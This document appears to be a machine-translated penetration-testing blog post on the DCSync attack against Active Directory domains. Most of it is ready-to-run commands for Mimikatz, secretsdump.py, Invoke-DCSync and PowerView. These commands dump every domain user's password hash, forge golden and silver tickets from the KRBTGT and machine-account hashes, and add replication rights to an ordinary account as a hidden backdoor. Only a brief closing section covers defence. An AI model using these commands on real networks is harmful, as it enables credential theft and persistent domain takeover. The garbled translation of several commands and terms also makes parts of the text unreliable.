What is DCSync
In a domain environment, domain data is synchronized between domain controllers (DCS) every 15 minutes. When a domain controller (DC 1) wants to obtain data from another domain controller (DC 2), DC 1 sends a GetNCChanges request to DC 2. The request contains the data to be synchronized. If a large amount of data needs to be synchronized, the preceding procedure is repeated. DCSync uses this principle to send data synchronization requests to domain controllers through the GetNCChanges interface of the Directory Replication Service (DRS) Service.
DCSync is a commonly used technology in domain penetration, which is integrated in Mimikatz. Before DCSync, to get the hash of a domain user, you had to log in to the domain controller and execute code on the domain controller to get the hash of the domain user.
In August 2015, Benjamin Delpy (the author of the Artifact Mimikatz) and Vincent Le Toux released a new version of Mimikatz with the addition of DCSync. This feature can mimic a domain controller and request data from a real domain controller, such as a user’s hash. The most important feature of this function is that data on the domain controller can be obtained remotely through synchronous replication of domain data without landing domain controller.
Note: DCSync attacks on read-only domain controllers (ROdcs) will fail because ROdcs cannot participate in copying and synchronizing data to other DCS.
By default, only users in the Administrators, Domain Controllers, and Enterprise Domain Admins groups have permission to use DCSync, However, you can add Access Control lists (ACLs) to common users in a domain to enable common users to invoke DCSync.
2021 Latest collation network security penetration testing/security learning (full set of video, big factory face classics, boutique manual, essential kit) a > point I < a
Export the intradomain hash using DCSync
After obtaining the appropriate permissions, we can use DCSync to export the hashes of the users in the domain. The principle is to copy user hash credentials from the domain controller through IDL_DRSGetNCChanges using the Directory Replication Service (DRS) protocol. After obtaining the hash of the user in the domain, it can be further utilized.
Through Mimikatz
Run the following command on the domain member host:
Lsadump ::dcsync /domain:whoamianony.org /user:administrator lsadump::dcsync /domain:whoamianony.org Lsadump ::dcsync /domain:whoamianony.org /all lsadump::dcsync /domain:whoamianony.org /all /csvCopy the code
As shown in the preceding figure, the NTLM hash of the Administrator user is successfully obtained.
Through Secretsdump. Py
Secretsdump. Py is a script in the Impacket framework that can also export a user’s hash on a domain controller using DCSync technology. The tool works by first remotely connecting to the domain controller through SMBExEC or WMIEXEC with the provided user login credentials and obtaining high privileges, then exporting the hashes of the local account from the registry and all the hashes of the domain users through Dcsync or from the NTDs.dit file. Its biggest advantage is that it supports connections from computers outside the domain to the domain controller.
The usage method is as follows:
Python3 secretsdump. Py whoamianony/administrator: [email protected] - dc - IP 192.168.93.30 - just - dc - user Py domain/<username for DCSync>:password@< dC-ip > -dc-ip <dc-ip> -just-dc-user <username for DCSync>Copy the code
Python3 secretsdump. Py whoamianony/administrator: [email protected] # for all domain user hash, including machine usersCopy the code
Through the PowerShell
This script can Invoke the DCSync function in mimikats.dll via invoke-reflectivepeInjection
Run the following command on the domain member host:
Import - Module. \ Invoke - DCSync ps1 # export all domain user hash value Invoke - DCSync - DumpForest - Users @ (" administrator ") | ft - wrap - # autosize export domain the hash value of the user within the Invoke - DCSync - DumpForest | ft - wrap - autosizeCopy the codeUse DCSync to make gold notes
In domain penetration, we can export the hash of the KRBTGT account in the domain controller through DCSync and use the hash of the KRBTGT account to make gold notes.
The test environment is as follows:
Assuming that the attacker has taken down the Intranet host Windows 10, the following shows how to use DCSync to make gold tickets to access resources on the DC on the Intranet.
After taking down the Windows 10 host, we loaded the Kiwi module:
load kiwi
Then run the Mimikatz command through kiwi_cmd to export the hash of the KRBTGT account in the domain controller using Mimikatz’s DCSync function:
kiwi_cmd "lsadump::dcsync /domain:whoamianony.org /user:krbtgt"
Copy the code
We can then generate the gold note by hashing the KRBTGT account:
golden_ticket_create -u Administrator -d whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142 -k 6be58bfcc0a164af2408d1d3bd313c2a -t gold.tck
Copy the codeThe ticket generated after execution is stored on your Kali, then execute the following command to clear the ticket on the target host:
kerberos_ticket_purge
When kerberOS_ticket_use is used to inject the generated ticket:
kerberos_ticket_use gold.tck
As shown in the figure above, the ticket was successfully injected. In this case, an attacker can access resources on the domain controller using Windows 7:
dir \\DC\c$
The operation after having gold note is simple, understand all understand!
Use DCSync for intra-domain permission maintenance
As we mentioned earlier, to take advantage of DCSync, you need to have user permissions in the Administrators, Domain Controllers, or Enterprise Domain Admins groups. But can’t we give normal domain users access to DCSync? Of course you can!
Once we have obtained the domain administrator permission, we can change the domain user’s permission to have DCSync operation permission, so that the domain user can also export the information of the domain user, which can make a hidden back door to maintain the permission. To do this, add three ACE access controls for common domain users:
DS – Replication – Get – Changes (f6aa GUID: 1131-9 c07-11 d1 – f79f – 00 c04fc2dcd2)
DS – Replication – Get – Changes – All (f6ad GUID: 1131-9 c07-11 d1 – f79f – 00 c04fc2dcd2)
DS – Replication – Get – Changes (GUID: 89 e95b76 c62-444 – d – 4-991 – a – 0 facbeda640c)
We can do this with the Powerview.ps1 script in the Empire framework:
Import-module.\powerview.ps1 # Add ACE add-domainObjectacl-targetidEntity "DC=whoamianony,DC=org" -PrincipalIdentity whoami-rights dcsync-verbose # Delete the above three ACE remot-domainObjectacl-targetidEntity for domain user whoami "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -VerboseCopy the code
This time domain user whoami has DCSync permission. You can then use the whoami user’s permissions to perform DCSync attacks.
We can use the identity of the whoami user to export the user hash on the DC through the DCSync function in Secretsdump.
Python3 secretsdump. Py whoamianony/whoami: [email protected] - dc - IP 192.168.93.30 - just - dc - user administratorCopy the code
You can use it firstrunasImplement login whoami user and then use DCSync.
First run the following command to pop up a CMD for whoami user login permission:
runas /noprofile /user:whoamianony\whoami cmd
Then execute Mimikatz in the CMD that pops up to do DCSync:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:whoamianony.org /all /csv" exit
Copy the code
Similarly, you can log in to a WHOami user using a PowerShell implementation before using DCSync.
First run the following command to pop up a CMD for whoami user login permission:
$uname="whoamianony\whoami" $PWD = convertto-secureString "Whoami2021" -asplainText -- Force $cred= new-object System.Management.Automation.PSCredential($uname,$pwd) Start-Process -FilePath "cmd.exe" -Credential $credCopy the codeMimikatz: Mimikatz: DCSync:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:whoamianony.org /all /csv" exit
Copy the codeExample Query the users with DCSync permission in the domain
We can use Adfind to query users within a domain with DCSync privileges:
AdFind.exe -s subtree -b "DC=whoamianony,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;" Replicating Directory Changes";; -recmute AdFind.exe -s subtree -b "DC=whoamianony,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;" DS-Replication-Get-Changes";; -recmuteCopy the code
DCSync is implemented using a MachineAccount
A MachineAccount is a default account created by each computer after the system is installed. All hosts that join the domain will have a machine user, the user name is machine name plus $, such as: WIN7$, WINXP$.
The password for the computer account is stored in the registry at:
HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\$machine.ACC # This registry key path can only be accessed under SYSTEM permissionCopy the codeIf the computer is added to the domain, the password of the computer account is synchronized to the domain controller and saved in the domain controller’s NtdS.dit active directory database file. Computer account passwords are automatically updated every 30 days by default and are 120 characters long, so even if we get a hash of a computer account password, it’s almost impossible to recover the plaintext password for a computer account.
To implement DCSync using a machine account, the first step is to obtain the permissions for the machine account identity and then use the machine account identity to perform DCSync operations. The following is a specific demonstration.
First get the password hash of the MachineAccount
You can use Mimikatz directly on the domain control to export the password hash of the current computer account from a registry file.
privilege::debug
token::elevate
lsadump::secrets
Copy the code
You can also use DCSync to export password hashes for all computer accounts on a domain member host.
mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /all /csv"
Copy the code
Python3 secretsdump. Py whoamianony/administrator: [email protected]Copy the code
DCSync is then performed using the MachineAccount
Once we have the password hash of the machine account, we need to find a way to log into the machine account, and since we can’t crack the hash, we can use the silver bill method.
The utilization methods are as follows:
mimikatz "kerberos::golden /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /target:DC.whoamianony.org /service:LDAP /rc4:8e89dfbe74fcae2e993ea2aa47b6a9c1 /user:krbtgt /ptt" "lsadump::dcsync /domain:whoamianony.org /all /csv" exit
Copy the code
It is also possible to use secretsdump to export hashes from an out-of-domain computer connected to a domain controller using the hashes of the machine account:
Python3 secretsdump. Py - hashes: 8 e89dfbe74fcae2e993ea2aa47b6a9c1 whoamianony/DC $@ 192.168.93.30Copy the code
Note: If you use the password hash of a normal computer account in the domain to connect to the corresponding computer, it will fail.
DCSync defense
The principle of DCSync attack is to simulate synchronous data replication between domain controllers. The best defense is to whitelist the controller and set the trusted assets to the whitelist that allows synchronization.
In addition, we should also try to enumerate the ACLs of all users in Active Directory to find all privileged accounts and detect users in the domain that have DCSync privileges added. The ACLight project on Github provides this functionality. Simply Execute the execut-aclight2.bat project to generate the following three files:
Privileged Accounts – Layers Analysis.txt
Privileged Accounts Permissions – Final Report.csv
Privileged Accounts Permissions – Irregular Accounts.csv
All privileged accounts are displayed in the file.
